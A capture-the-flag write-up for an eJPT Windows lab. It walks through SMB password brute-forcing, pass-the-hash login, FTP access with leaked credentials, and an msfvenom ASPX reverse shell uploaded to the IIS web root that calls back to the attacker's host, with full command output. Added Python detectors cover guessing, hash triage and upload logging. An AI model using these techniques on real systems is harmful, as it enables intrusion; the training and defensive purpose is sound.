eJPT - Host & Network Penetration Testing: Exploitation CTF 2
This lab focuses on exploiting a Windows target machine. By identifying services, analyzing misconfigurations, and leveraging discovered credentials, you’ll uncover and capture the flags. Tasks involve exploiting SMB misconfigurations, utilizing NTLM hashes, and gaining access to the system.
Lab Environment
A target machine is accessible at target.ine.local. Identify the services and capture the flags.
- Flag 1: Looks like smb user tom has not changed his password for a very long time.
- Flag 2: Using the NTLM hash list discovered in the previous challenge, can you compromise the smb user nancy?
- Flag 3: I wonder what the hint found in the previous challenge could be useful for!
- Flag 4: Can you compromise the target machine and retrieve the C://flag4.txt file?
The following wordlist will be useful:
- /usr/share/wordlists/metasploit/unix_passwords.txt
Tools
- Metasploit
- Nmap
- smbmap
- Firefox
Flag 1:
Looks like smb user tom has not changed his password for a very long time.
Alright, let's start with an nmap scan to gather information about the system. Here is the information we got from the target:
┌──(root㉿INE)-[~]
└─# nmap -sC -sV target.ine.local
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-31 08:47 IST
Nmap scan report for target.ine.local (10.5.26.9)
Host is up (0.0018s latency).
Not shown: 990 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/8.5
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ssl/ms-wbt-server?
|_ssl-date: 2025-05-31T03:18:16+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=WIN-M878Q9NE9S6
| Not valid before: 2025-01-08T05:31:54
|_Not valid after: 2025-07-10T05:31:54
| rdp-ntlm-info:
| Target_Name: WIN-M878Q9NE9S6
| NetBIOS_Domain_Name: WIN-M878Q9NE9S6
| NetBIOS_Computer_Name: WIN-M878Q9NE9S6
| DNS_Domain_Name: WIN-M878Q9NE9S6
| DNS_Computer_Name: WIN-M878Q9NE9S6
| Product_Version: 6.3.9600
|_ System_Time: 2025-05-31T03:18:09+00:00
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
| smb2-time:
| date: 2025-05-31T03:18:12
|_ start_date: 2025-05-31T02:57:55
| smb2-security-mode:
| 3:0:2:
|_ Message signing enabled but not required
Based on the question we already know the username, tom, so let's brute-force his SMB password on the target using crackmapexec with the provided wordlist:
┌──(root㉿INE)-[~]
└─# crackmapexec smb target.ine.local -u tom -p /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
[*] First time use detected
[*] Creating home directory structure
[*] Creating default workspace
[*] Initializing RDP protocol database
[*] Initializing SSH protocol database
[*] Initializing MSSQL protocol database
[*] Initializing FTP protocol database
[*] Initializing LDAP protocol database
[*] Initializing WINRM protocol database
[*] Initializing SMB protocol database
[*] Copying default configuration file
[*] Generating SSL certificate
SMB target.ine.local 445 WIN-M878Q9NE9S6 [*] Windows 8.1 / Server 2012 R2 Build 9600 x64 (name:WIN-M878Q9NE9S6) (domain:WIN-M878Q9NE9S6) (signing:False) (SMBv1:False)
SMB target.ine.local 445 WIN-M878Q9NE9S6 [-] WIN-M878Q9NE9S6\tom:admin STATUS_LOGON_FAILURE
SMB target.ine.local 445 WIN-M878Q9NE9S6 [-] WIN-M878Q9NE9S6\tom:123456 STATUS_LOGON_FAILURE
SMB target.ine.local 445 WIN-M878Q9NE9S6 [+] WIN-M878Q9NE9S6\tom:felipe
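The crackmapexec run above is exactly what a password-guessing attack looks like from the target's side: a burst of failed network logons for one account from one source, followed by a success. The following is an added example, not part of the original writeup, showing the detection logic a defender would run over Windows Security events for that pattern. It assumes a simplified, constructed key=value event format (4625 = failed logon, 4624 = successful logon, LogonType 3 = network logon, which is what SMB produces); the timestamps, users and addresses are made up for the sample.

```python
"""Detect SMB password guessing followed by a successful logon.

Added example (not from the original writeup). Events are in a constructed
key=value form: EventID 4625 = failed logon, 4624 = successful logon,
LogonType 3 = network logon (what an SMB authentication produces).
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample events modelled on the crackmapexec run above:
# several failures for 'tom' from one source within seconds, then a success.
SAMPLE_EVENTS = """\
2025-05-31T03:20:01Z EventID=4625 TargetUser=tom Src=10.10.47.2 LogonType=3
2025-05-31T03:20:01Z EventID=4625 TargetUser=tom Src=10.10.47.2 LogonType=3
2025-05-31T03:20:02Z EventID=4625 TargetUser=tom Src=10.10.47.2 LogonType=3
2025-05-31T03:20:02Z EventID=4625 TargetUser=tom Src=10.10.47.2 LogonType=3
2025-05-31T03:20:03Z EventID=4625 TargetUser=tom Src=10.10.47.2 LogonType=3
2025-05-31T03:20:03Z EventID=4624 TargetUser=tom Src=10.10.47.2 LogonType=3
2025-05-31T03:25:00Z EventID=4625 TargetUser=nancy Src=10.10.47.9 LogonType=3
2025-05-31T03:40:00Z EventID=4624 TargetUser=nancy Src=10.10.47.9 LogonType=3
2025-05-31T04:00:00Z EventID=4624 TargetUser=alice Src=10.5.26.40 LogonType=2
"""


def parse_event(line):
    """Turn one 'timestamp key=value ...' line into a dict with a datetime."""
    ts, *fields = line.split()
    ev = dict(f.split("=", 1) for f in fields)
    ev["ts"] = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")
    return ev


def find_guessing(lines, threshold=5, window=timedelta(minutes=5)):
    """Return alerts as (kind, src, user, failures_in_window).

    'guessing' fires once when a (source, user) pair reaches `threshold`
    failed network logons inside `window`; 'success_after_failures' fires
    when a successful logon arrives while recent failures are still in the
    window, which is the signal that the guessed password worked.
    """
    failures = defaultdict(deque)  # (src, user) -> timestamps of recent 4625s
    alerts = []
    for line in lines:
        if not line.strip():
            continue
        ev = parse_event(line)
        if ev["LogonType"] != "3":  # only network logons (SMB, not console)
            continue
        key = (ev["Src"], ev["TargetUser"])
        q = failures[key]
        while q and ev["ts"] - q[0] > window:  # expire old failures
            q.popleft()
        if ev["EventID"] == "4625":
            q.append(ev["ts"])
            if len(q) == threshold:  # fire once when the threshold is crossed
                alerts.append(("guessing", key[0], key[1], len(q)))
        elif ev["EventID"] == "4624" and q:
            alerts.append(("success_after_failures", key[0], key[1], len(q)))
            q.clear()
    return alerts


if __name__ == "__main__":
    for alert in find_guessing(SAMPLE_EVENTS.splitlines()):
        print(alert)
```

The 'success_after_failures' alert is the one worth paging on: a guessing burst that ends in a 4624 means the account is now in the attacker's hands, whereas a burst that never succeeds is a lockout-policy and signing-configuration conversation. The nancy lines show the window doing its job: one failure fifteen minutes before a success is not correlated.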
Here we found that tom's password is felipe (tom:felipe). Now that we have credentials, let's use smbmap to identify which shares we can access with them.
We found some interesting shares. Let's take a look at HRDocuments: there we find flag1.txt, and alongside it a file named leaked-hashes.txt.
┌──(root㉿INE)-[~]
└─# smbmap -H target.ine.local -u tom -p felipe
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.2 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authentidated session(s)
[+] IP: 10.5.16.222:445 Name: target.ine.local Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
D$ NO ACCESS Default share
HRDocuments READ ONLY
IPC$ READ ONLY Remote IPC
ITResources NO ACCESS
print$ READ ONLY Printer Drivers
┌──(root㉿INE)-[~]
└─# smbclient //target.ine.local/HRDocuments -U tom
Password for [WORKGROUP\tom]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sat May 31 19:15:38 2025
.. D 0 Sat May 31 19:15:38 2025
flag1.txt A 34 Sat May 31 19:15:38 2025
leaked-hashes.txt A 6665 Fri Jun 14 11:35:55 2024
5678591 blocks of size 4096. 58043 blocks available
smb: \> get flag1.txt
getting file \flag1.txt of size 34 as flag1.txt (3.7 KiloBytes/sec) (average 3.7 KiloBytes/sec)
smb: \> !cat flag1.txt
f8c013534b1f4702bb8b12*******
Flag 2:
Using the NTLM hash list discovered in the previous challenge, can you compromise the smb user nancy?
Since we already hold the hash list, let's try to find our way in using those hashes. For this we'll use msfconsole with the auxiliary/scanner/smb/smb_login module, which accepts NTLM hashes in place of passwords:
msf6 auxiliary(scanner/smb/smb_login) > set rhost target.ine.local
rhost => target.ine.local
msf6 auxiliary(scanner/smb/smb_login) > set pass_file leaked-hashes.txt
pass_file => leaked-hashes.txt
msf6 auxiliary(scanner/smb/smb_login) > set smbuser nancy
smbuser => nancy
msf6 auxiliary(scanner/smb/smb_login) > set createsession true
createsession => true
msf6 auxiliary(scanner/smb/smb_login) > run
[-] 10.5.16.222:445 - 10.5.16.222:445 - Failed: '.\nancy:aad3b435b51404eeaad3b435b51404ee:a01c5c6b02e0b6752a33d1e7b0a33aa0',
[-] 10.5.16.222:445 - 10.5.16.222:445 - Failed: '.\nancy:aad3b435b51404eeaad3b435b51404ee:34ec1e4f6f7cbe35a09ee51b1c0039d2',
[+] 10.5.16.222:445 - 10.5.16.222:445 - Success: '.\nancy:aad3b435b51404eeaad3b435b51404ee:b3ddea4b4b957f3e037af75cfe5317ad'
[*] SMB session 1 opened (10.10.47.2:36545 -> 10.5.16.222:445) at 2025-05-31 19:43:21 +0530
[*] target.ine.local:445 - Scanned 1 of 1 hosts (100% complete)
[*] target.ine.local:445 - Bruteforce completed, 1 credential was successful.
[*] target.ine.local:445 - 1 SMB session was opened successfully.
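What makes the hash list usable at all is the NTLM format: each entry is an LM hash and an NT hash, 32 hex characters each, separated by a colon, and NTLM authentication accepts the NT hash directly, so a leaked hash is as good as the password. The following is an added example, not from the original writeup, of how an analyst would triage such a dump before deciding what to rotate. The writeup never shows the contents of leaked-hashes.txt, so the sample below is constructed; it assumes the LM:NT layout that smb_login's pass_file consumes, with pwdump-style user:rid:LM:NT::: lines also accepted. The two constants are well known: aad3b435b51404eeaad3b435b51404ee is the LM hash stored when LM hashing is disabled, and 31d6cfe0d16ae931b73c59d7e0c089c0 is the NT hash of an empty password.

```python
"""Triage a pwdump-style NTLM hash list.

Added example, not from the original writeup. The sample is constructed;
the real leaked-hashes.txt is never shown on the page.
"""
import re

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash when LM storage is disabled
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password

# Accepts "LM:NT" or "user:rid:LM:NT:::" (pwdump layout).
HASH_LINE = re.compile(
    r"^(?:(?P<user>[^:]+):(?P<rid>\d+):)?"
    r"(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):*$",
    re.IGNORECASE,
)

# Constructed sample; the first three NT hashes are the ones smb_login tried above.
SAMPLE_HASHES = """\
# constructed sample, not the lab file
aad3b435b51404eeaad3b435b51404ee:a01c5c6b02e0b6752a33d1e7b0a33aa0
aad3b435b51404eeaad3b435b51404ee:34ec1e4f6f7cbe35a09ee51b1c0039d2
aad3b435b51404eeaad3b435b51404ee:b3ddea4b4b957f3e037af75cfe5317ad
guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
aad3b435b51404eeaad3b435b51404ee:b3ddea4b4b957f3e037af75cfe5317ad
not-a-hash-line
"""


def parse_hash_list(text):
    """Return (records, malformed): one record per well-formed line."""
    records, malformed = [], []
    for n, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = HASH_LINE.match(line)
        if not m:
            malformed.append((n, line))
            continue
        lm, nt = m["lm"].lower(), m["nt"].lower()
        records.append({
            "line": n,
            "user": m["user"],
            "lm": lm,
            "nt": nt,
            "lm_present": lm != EMPTY_LM,      # legacy LM hash stored: trivially crackable
            "empty_password": nt == EMPTY_NT,  # account has a blank password
        })
    return records, malformed


def triage(text):
    """Summarise what a defender needs to know before rotating credentials."""
    records, malformed = parse_hash_list(text)
    return {
        "valid": len(records),
        "invalid": len(malformed),
        "unique_nt": len({r["nt"] for r in records}),
        "lm_present": sum(r["lm_present"] for r in records),
        "empty_password": sum(r["empty_password"] for r in records),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_HASHES).items():
        print(f"{key}: {value}")
```

The unique NT count is the number of distinct passwords that must be changed; duplicates across accounts mean password reuse, and any hit on EMPTY_NT is an account with no password at all. Because the hash itself authenticates, cracking it is irrelevant to the response: every NT hash in the file is burned the moment the file is readable from a share.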
Now that we have a session on the target, let's interact with it and look through the shares:
msf6 auxiliary(scanner/smb/smb_login) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 smb SMB nancy @ 10.5.16.222:445 10.10.47.2:36545 -> 10.5.16.222:445 (10.5.16.222)
msf6 auxiliary(scanner/smb/smb_login) > sessions 1
[*] Starting interaction with 1...
SMB (10.5.16.222) > shares
Shares
======
# Name Type comment
- ---- ---- -------
0 ADMIN$ DISK|SPECIAL Remote Admin
1 C$ DISK|SPECIAL Default share
2 D$ DISK|SPECIAL Default share
3 HRDocuments DISK
4 IPC$ IPC|SPECIAL Remote IPC
5 ITResources DISK
6 print$ DISK Printer Drivers
SMB (10.5.16.222) > shares -i ITResources
[+] Successfully connected to ITResources
SMB (10.5.16.222\ITResources) > dir
ls
===
# Type Name Created Accessed Written Changed Size
- ---- ---- ------- -------- ------- ------- ----
0 DIR . 2024-06-13T14:11:07+05:30 2025-05-31T19:15:38+05:30 2025-05-31T19:15:38+05:30 2025-05-31T19:15:38+05:30
1 DIR .. 2024-06-13T14:11:07+05:30 2025-05-31T19:15:38+05:30 2025-05-31T19:15:38+05:30 2025-05-31T19:15:38+05:30
2 FILE flag2.txt 2025-05-31T19:15:38+05:30 2025-05-31T19:15:38+05:30 2025-05-31T19:15:38+05:30 2025-05-31T19:15:38+05:30 34
3 FILE hint.txt 2024-06-13T14:45:39+05:30 2024-06-13T14:45:39+05:30 2024-06-13T16:00:47+05:30 2024-06-13T16:00:47+05:30 71
SMB (10.5.16.222\ITResources) > download flag2.txt
[*] Downloaded 34.00 B of 34.00 B (100.0%)
[+] Downloaded flag2.txt to flag2.txt
SMB (10.5.16.222\ITResources) > download hint.txt
[*] Downloaded 71.00 B of 71.00 B (100.0%)
[+] Downloaded hint.txt to hint.txt
With that we found flag2.txt and, in hint.txt, a credential for further investigation: david:omnitrix_9901.
Flag 3:
I wonder what the hint found in the previous challenge could be useful for!
Now that we have these credentials, let's try them against the FTP service running on the target. We manage to log in and find flag3.txt:
┌──(root㉿INE)-[~]
└─# ftp target.ine.local
Connected to target.ine.local.
220 Microsoft FTP Service
Name (target.ine.local:root): david
331 Password required
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
229 Entering Extended Passive Mode (|||49404|)
125 Data connection already open; Transfer starting.
06-13-24 10:36AM <DIR> aspnet_client
05-31-25 01:45PM 34 flag3.txt
06-13-24 10:34AM 99710 iis-85.png
06-13-24 10:34AM 701 iisstart.htm
226 Transfer complete.
ftp> get flag3.txt
local: flag3.txt remote: flag3.txt
229 Entering Extended Passive Mode (|||49407|)
125 Data connection already open; Transfer starting.
100% |********************************************************************************************************************************************| 34 9.10 KiB/s 00:00 ETA
226 Transfer complete.
34 bytes received in 00:00 (8.45 KiB/s)
ftp> !cat flag3.txt
5871dd181fee4eb4a4dc43a8********
Flag 4:
Can you compromise the target machine and retrieve the C://flag4.txt file?
After going through the FTP and web services, we found that the files served over FTP are the same ones reachable through the web page (the FTP root is the IIS web root), meaning a file uploaded over FTP can be executed by requesting it through the web server. So let's create a reverse shell, start a handler to receive the connection, upload the shell over FTP and trigger it through the web page to gain access to the system.
Creating the reverse shell script:
┌──(root㉿INE)-[~]
└─# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.47.2 LPORT=1234 -f aspx > shell.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of aspx file: 3658 bytes
Uploading the script over FTP:
┌──(root㉿INE)-[~]
└─# ftp target.ine.local
Connected to target.ine.local.
220 Microsoft FTP Service
Name (target.ine.local:root): david
331 Password required
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put shell.aspx
local: shell.aspx remote: shell.aspx
229 Entering Extended Passive Mode (|||49474|)
125 Data connection already open; Transfer starting.
100% |********************************************************************************************************************************************| 3705 26.56 MiB/s --:-- ETA
226 Transfer complete.
3705 bytes sent in 00:00 (1.38 MiB/s)
ftp> dir
229 Entering Extended Passive Mode (|||49476|)
125 Data connection already open; Transfer starting.
06-13-24 10:36AM <DIR> aspnet_client
05-31-25 01:45PM 34 flag3.txt
06-13-24 10:34AM 99710 iis-85.png
06-13-24 10:34AM 701 iisstart.htm
05-31-25 02:39PM 3705 shell.aspx
226 Transfer complete.
Starting the handler to receive the connection back:
msf6 exploit(multi/handler) > set lhost 10.10.47.2
lhost => 10.10.47.2
msf6 exploit(multi/handler) > set lport 1234
lport => 1234
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.47.2:1234
Now that the full setup is deployed, let's trigger the reverse shell: navigate to http://target.ine.local/shell.aspx in the browser. We should observe that we have obtained a shell:
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.47.2:1234
[*] Sending stage (201798 bytes) to 10.5.29.153
[*] Meterpreter session 1 opened (10.10.47.2:1234 -> 10.5.29.153:49277) at 2025-05-31 20:25:49 +0530
meterpreter > cd /
meterpreter > dir
Listing: c:\
============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 0 dir 2020-09-10 15:20:33 +0530 $Recycle.Bin
100666/rw-rw-rw- 1 fil 2013-06-18 17:48:29 +0530 BOOTNXT
040777/rwxrwxrwx 0 dir 2013-08-22 20:18:41 +0530 Documents and Settings
040777/rwxrwxrwx 0 dir 2013-08-22 21:22:33 +0530 PerfLogs
040555/r-xr-xr-x 4096 dir 2020-08-12 09:43:47 +0530 Program Files
040777/rwxrwxrwx 4096 dir 2022-11-15 12:21:37 +0530 Program Files (x86)
040777/rwxrwxrwx 4096 dir 2020-09-05 14:35:45 +0530 ProgramData
040777/rwxrwxrwx 0 dir 2024-06-13 14:11:17 +0530 Shares
040777/rwxrwxrwx 0 dir 2020-09-05 09:16:57 +0530 System Volume Information
040555/r-xr-xr-x 4096 dir 2025-01-09 11:06:51 +0530 Users
040777/rwxrwxrwx 24576 dir 2025-01-09 11:00:26 +0530 Windows
100444/r--r--r-- 398356 fil 2014-03-18 15:35:18 +0530 bootmgr
100666/rw-rw-rw- 34 fil 2025-05-31 20:16:14 +0530 flag4.txt
040777/rwxrwxrwx 0 dir 2024-06-13 16:05:01 +0530 inetpub
000000/--------- 0 fif 1970-01-01 05:30:00 +0530 pagefile.sys
meterpreter > cat flag4.txt
eb2aba7543c844ea977fdf6*******
meterpreter >
With that we found all the flags on this machine!
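The whole Flag 4 chain rests on one misconfiguration: an FTP account that can write into the IIS web root, where anything with a server-side extension is executed on the next HTTP request. The following is an added example, not from the original writeup, of the check a defender would run over the IIS FTP logs to catch that upload: parse the W3C extended log by its #Fields directive and flag STOR/APPE commands whose filename carries an executable extension, separating completed uploads from rejected ones and noting whether the destination sits under the web root. The log sample is constructed and its field set is simplified (real IIS FTP logs carry more columns, which the #Fields parsing handles the same way); the paths, users and addresses are made up.

```python
"""Flag uploads of server-executable files into an IIS web root from FTP logs.

Added example, not from the original writeup. The W3C log below is constructed
with a reduced field set; the parser reads whatever '#Fields:' declares.
"""
import ntpath

# Extensions IIS will execute or honour server-side when requested over HTTP.
SERVER_EXECUTABLE = {".aspx", ".asp", ".ashx", ".asmx", ".asax", ".config", ".exe", ".dll"}

# Constructed sample: the writeup's shell.aspx upload plus some benign traffic.
SAMPLE_FTP_LOG = r"""#Software: Microsoft Internet Information Services 8.5
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem sc-status x-fullpath
2025-05-31 14:39:02 10.10.47.2 david 10.5.26.9 21 USER david 331 -
2025-05-31 14:39:02 10.10.47.2 david 10.5.26.9 21 PASS *** 230 -
2025-05-31 14:39:10 10.10.47.2 david 10.5.26.9 21 STOR shell.aspx 226 C:\inetpub\wwwroot\shell.aspx
2025-05-31 14:40:00 10.10.47.2 david 10.5.26.9 21 RETR flag3.txt 226 C:\inetpub\wwwroot\flag3.txt
2025-05-31 14:41:00 10.10.47.5 tom 10.5.26.9 21 STOR report.pdf 226 C:\ftp\tom\report.pdf
2025-05-31 14:42:00 10.10.47.5 tom 10.5.26.9 21 STOR notes.asp 550 C:\ftp\tom\notes.asp
"""


def parse_w3c(text):
    """Parse a W3C extended log into dicts keyed by the names in '#Fields:'."""
    fields, rows = None, []
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#"):  # other directives (#Software, #Date, ...)
            continue
        if fields is None:
            raise ValueError("data line before any #Fields directive")
        values = line.split()
        if len(values) != len(fields):  # truncated or malformed line
            continue
        rows.append(dict(zip(fields, values)))
    return rows


def find_executable_uploads(text, webroot=r"C:\inetpub\wwwroot"):
    """Return (completed, attempted) uploads of server-executable files."""
    root = ntpath.normpath(webroot).lower()
    completed, attempted = [], []
    for row in parse_w3c(text):
        if row["cs-method"].upper() not in ("STOR", "APPE"):
            continue
        ext = ntpath.splitext(row["cs-uri-stem"])[1].lower()
        if ext not in SERVER_EXECUTABLE:
            continue
        full = ntpath.normpath(row["x-fullpath"]).lower()
        finding = {
            "user": row["cs-username"],
            "src": row["c-ip"],
            "file": row["cs-uri-stem"],
            "status": row["sc-status"],
            "in_webroot": full == root or full.startswith(root + "\\"),
        }
        # 2xx reply codes mean the transfer finished; anything else was refused.
        (completed if row["sc-status"].startswith("2") else attempted).append(finding)
    return completed, attempted


if __name__ == "__main__":
    done, tried = find_executable_uploads(SAMPLE_FTP_LOG)
    for f in done:
        print("UPLOADED", f)
    for f in tried:
        print("REJECTED", f)
```

A completed upload with in_webroot set is the actionable finding, and correlating it with an HTTP request for the same filename from the same source in the IIS web log confirms execution. The fix is structural rather than detective: the FTP site root should not be the web root, and an FTP user that only needs to fetch files should not have write permission at all.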